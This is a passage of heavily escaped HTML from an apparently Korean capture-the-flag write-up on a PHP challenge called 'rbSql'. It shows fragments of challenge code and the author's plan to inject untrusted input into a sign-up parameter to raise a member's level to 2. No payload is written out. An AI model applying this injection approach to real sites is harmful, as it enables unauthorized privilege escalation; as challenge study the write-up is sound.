-webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a87598020319-4&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;rbSql&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;delete&quot;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;member_&quot;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$_SESSION&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;'uid'&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;id&quot;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$_SESSION&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;'uid'&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a87598020319-5&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;}&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;/div&gt;&lt;p style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; font-size: 18px; line-height: 1.618; color: rgb(60, 72, 88); font-family: Roboto, Helvetica, Arial, sans-serif;&quot;&gt;&lt;strong style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent;&quot;&gt;flag routine in index.php&lt;/strong&gt;&lt;/p&gt;&lt;p style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; font-size: 18px; line-height: 1.618; color: rgb(60, 72, 88); font-family: Roboto, Helvetica, Arial, sans-serif;&quot;&gt;또한 출력한 이후 해당 멤버의 정보를 삭제하는 기능이 포함되어 있는 것으로 보아 insert injection의 기운이 느껴졌습니다. 하지만 이 문제는 일반적인 SQL이 아닌 rbSql입니다. 따라서 dbconn.php 내에 포함되어 있는 기능들을 분석하여 데이터 삽입 시 취약한 부분을 찾아내 익스플로잇을 해야겠죠.&lt;/p&gt;&lt;p style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; font-size: 18px; line-height: 1.618; color: rgb(60, 72, 88); font-family: Roboto, Helvetica, Arial, sans-serif;&quot;&gt;rbSql의 구조는 간단합니다.&lt;/p&gt;&lt;p style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; font-size: 18px; line-height: 1.618; color: rgb(60, 72, 88); font-family: Roboto, Helvetica, Arial, sans-serif;&quot;&gt;rbSqlSchema라는 메인 스키마 파일이 존재하며, 이 파일이 관리하는 서브테이블(멤버테이블)들이 존재합니다. 각 서브테이블에 있는 데이터를 얻기 위해서는 rbSqlSchema를 참조하여 멤버 이름에 해당하는 서브테이블을 찾아가 패킹된 데이터를 파싱해야 합니다. 이를 위해 dbconn.php를 분석해보죠.&lt;/p&gt;&lt;p style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; font-size: 18px; line-height: 1.618; color: rgb(60, 72, 88); font-family: Roboto, Helvetica, Arial, sans-serif;&quot;&gt;dbconn.php 내에는 rbSql, rbParse, rbPack, rbGetPath, rbReadFile, rbWriteFile로 총 6개의 함수가 존재합니다. 우리가 원하는 것은 회원가입 시 취약한 파라미터에 untrusted input을 삽입해 멤버 권한(lvl)을 2로 만드는 것입니다.&lt;/p&gt;&lt;div id=&quot;crayon-5c677473e1a8d450214921&quot; class=&quot;crayon-syntax crayon-theme-github crayon-font-monaco crayon-os-pc print-yes notranslate&quot; data-settings=&quot; minimize scroll-mouseover&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; text-size-adjust: none; width: 750px; padding: 0px; margin: 12px 0px; font-family: Monaco, MonacoRegular, &amp;quot;Courier New&amp;quot;, monospace; color: rgb(60, 72, 88); height: auto; overflow: hidden !important; position: relative !important; direction: ltr !important; border: 1px solid rgb(222, 222, 222) !important; background-color: rgb(248, 248, 255) !important; font-size: 12px !important; line-height: 15px !important;&quot;&gt;&lt;div class=&quot;crayon-plain-wrap form-group&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; position: relative; background: 0px center; border: 0px; margin: 0px !important; padding: 0px !important; height: auto !important;&quot;&gt;&lt;textarea wrap=&quot;soft&quot; class=&quot;crayon-plain print-no form-control&quot; data-settings=&quot;dblclick&quot; readonly=&quot;&quot; style=&quot;-webkit-tap-highlight-color: transparent; color: rgb(0, 0, 0); font-style: inherit; font-variant: inherit; font-stretch: inherit; margin: 0px 0px 7px; overflow: hidden; max-width: 100%; padding-top: 0px; padding-right: 5px; padding-left: 5px; display: block; width: 748px; height: 0px; background: linear-gradient(rgb(156, 39, 176), rgb(156, 39, 176)) center bottom / 0px 2px no-repeat, linear-gradient(rgb(210, 210, 210), rgb(210, 210, 210)) center calc(100% - 1px) / 100% 1px transparent; border-width: 0px; border-style: initial; border-color: initial; border-radius: 0px; box-shadow: none; transition: background 0s ease-out 0s; float: none; vertical-align: middle; resize: none; position: absolute; opacity: 0; white-space: pre; overflow-wrap: normal; tab-size: 4; z-index: 0; font-size: 12px !important; line-height: 15px !important; font-family: Monaco, MonacoRegular, &amp;quot;Courier New&amp;quot;, monospace !important;&quot;&gt;&lt;/textarea&gt;&lt;/div&gt;&lt;div class=&quot;crayon-main&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; background: 0px center; border: 0px; padding: 0px; margin: 0px; width: 748px; overflow: hidden; position: relative; z-index: 1;&quot;&gt;&lt;table class=&quot;crayon-table&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-size: 18px; margin-left: 0px; border-collapse: collapse !important; border-spacing: 0px !important; background: none !important; width: auto !important; border: none !important; padding: 0px !important; margin-right: 0px !important; margin-bottom: 0px !important; margin-top: 0px !important; table-layout: auto !important;&quot;&gt;&lt;tbody style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent;&quot;&gt;&lt;tr class=&quot;crayon-row&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; background: 0px center; border: none !important; padding: 0px !important; vertical-align: top !important; margin: 0px !important;&quot;&gt;&lt;td class=&quot;crayon-nums &quot; data-settings=&quot;show&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; padding: 0px !important; vertical-align: top !important; font-family: Monaco, MonacoRegular, &amp;quot;Courier New&amp;quot;, monospace !important; border: 0px; margin: 0px !important; background-image: initial; background-position: 0px center; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: rgb(238, 238, 238) !important;&quot;&gt;&lt;div class=&quot;crayon-nums-content&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; background: 0px center; border: 0px; padding-right: 0px; padding-left: 0px; margin: 0px; white-space: nowrap; padding-top: 5px !important; padding-bottom: 3px !important; font-size: 12px !important; line-height: 15px !important;&quot;&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c677473e1a8d450214921-1&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;1&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c677473e1a8d450214921-2&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;2&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c677473e1a8d450214921-3&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;3&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c677473e1a8d450214921-4&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;4&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c677473e1a8d450214921-5&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;5&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c677473e1a8d450214921-6&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;6&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c677473e1a8d450214921-7&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;7&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c677473e1a8d450214921-8&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;8&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c677473e1a8d450214921-9&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;9&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c677473e1a8d450214921-10&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;10&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c677473e1a8d450214921-11&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;11&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c677473e1a8d450214921-12&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;12&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c677473e1a8d450214921-13&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;13&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c677473e1a8d450214921-14&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;14&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c677473e1a8d450214921-15&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;15&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c677473e1a8d450214921-16&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;16&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c677473e1a8d450214921-17&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;17&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c677473e1a8d450214921-18&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;18&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c677473e1a8d450214921-19&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;19&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c677473e1a8d450214921-20&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;20&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c677473e1a8d450214921-21&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;21&lt;/div&gt;&lt;/div&gt;&lt;/td&gt;&lt;td class=&quot;crayon-code&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; padding: 0px !important; vertical-align: top !important; font-family: Monaco, MonacoRegular, &amp;quot;Courier New&amp;quot;, monospace !important; border: 0px; margin: 0px !important; background: 0px center; width: 722.4px;&quot;&gt;&lt;div class=&quot;crayon-pre&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; padding-right: 0px; padding-left: 0px; margin: 0px; white-space: pre; overflow: visible; tab-size: 4; background: none !important; border: none !important; padding-top: 5px !important; padding-bottom: 3px !important; font-size: 12px !important; line-height: 15px !important;&quot;&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a8d450214921-1&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;elseif&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$page&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;==&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;join_chk&quot;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;{&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a8d450214921-2&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) 